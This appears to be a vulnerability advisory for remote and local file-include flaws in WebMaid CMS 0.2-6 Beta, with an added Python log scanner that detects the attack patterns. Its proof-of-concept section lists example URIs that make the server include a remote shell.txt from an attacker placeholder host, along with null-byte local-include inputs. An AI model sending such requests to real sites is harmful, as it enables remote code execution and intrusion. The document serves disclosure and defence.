WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
BID:38993
Info
| Bugtraq ID: | 38993 |
| Class: | Input Validation Error |
| CVE: | CVE-2010-1266 CVE-2010-1267 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | cr4wl3r |
| Vulnerable: | WebMaid CMS WebMaid CMS 0.2-6 Beta |
| Not Vulnerable: | |
Discussion
WebMaid CMS is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the webserver process. This may facilitate unauthorized access.
WebMaid CMS 0.2-6 Beta is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/template/babyweb/index.php?template=[attacker.com]/shell.txt???
http://www.example.com/template/babyweb/index.php?menu=[attacker]/shell.txt???
http://www.example.com/template/babyweb/index.php?events=[attacker]/shell.txt???
http://www.example.com/template/babyweb/index.php?SITEROOT=[attacker]/shell.txt???
http://www.example.com/template/calm/footer.php?modules=[attacker]/shell.txt???
http://www.example.com/template/calm/footer.php?copyright=[attacker]/shell.txt???
http://www.example.com/template/calm/top.php?menu=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?modules=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?copyright=[attacker]/shell.txt???
http://www.example.com/template/wm025/footer.php?menu=[attacker]/shell.txt???
http://www.example.com/cContactus.php?com=[LFI%00]
http://www.example.com/cGuestbook.php?com=[LFI%00]
http://www.example.com/cArticle.php?com=[LFI%00]
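A log check for the request patterns listed above, as an added example that is not part of the original advisory: it flags requests to the listed scripts whose listed parameters carry a URL, a NUL byte or path traversal. The log format, the sample lines and the classification heuristics are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script paths and parameter names taken from the advisory's example URIs.
WATCHED = {
    "/template/babyweb/index.php": {"template", "menu", "events", "SITEROOT"},
    "/template/calm/footer.php": {"modules", "copyright"},
    "/template/calm/top.php": {"menu"},
    "/template/wm025/footer.php": {"modules", "copyright", "menu"},
    **{p: {"com"} for p in ("/cContactus.php", "/cGuestbook.php", "/cArticle.php")},
}
# Assumption: common/combined log format, request line in double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # scheme://host or //host

def classify(value):
    """Heuristic (assumed, not vendor guidance): why a decoded value looks like include abuse."""
    if REMOTE.search(value):
        return "remote-url"
    if "\x00" in value:  # parse_qsl has already decoded %00
        return "nul-byte"
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    return "absolute-path" if value.startswith("/") else None

def scan(lines):
    """Return (line_no, script, parameter, reason) for flagged requests to watched scripts."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify(value) if key in WATCHED.get(url.path, ()) else None
            if reason:
                hits.append((no, url.path, key, reason))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE = [
    '192.0.2.10 - - [26/Mar/2010:10:00:01 +0000] "GET /cArticle.php?com=news HTTP/1.1" 200 512',
    '192.0.2.44 - - [26/Mar/2010:10:00:07 +0000] "GET /template/calm/top.php?menu=http://host.invalid/shell.txt??? HTTP/1.1" 200 90',
    '192.0.2.44 - - [26/Mar/2010:10:00:09 +0000] "GET /cGuestbook.php?com=../../some/file%00 HTTP/1.1" 200 1432',
    '192.0.2.10 - - [26/Mar/2010:10:00:12 +0000] "GET /index.php?menu=http://host.invalid/x HTTP/1.1" 404 0',
]
if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Values are percent-decoded once, so double-encoded input is not normalised by this check.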
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- WebMaid CMS Homepage (WebMaid CMS)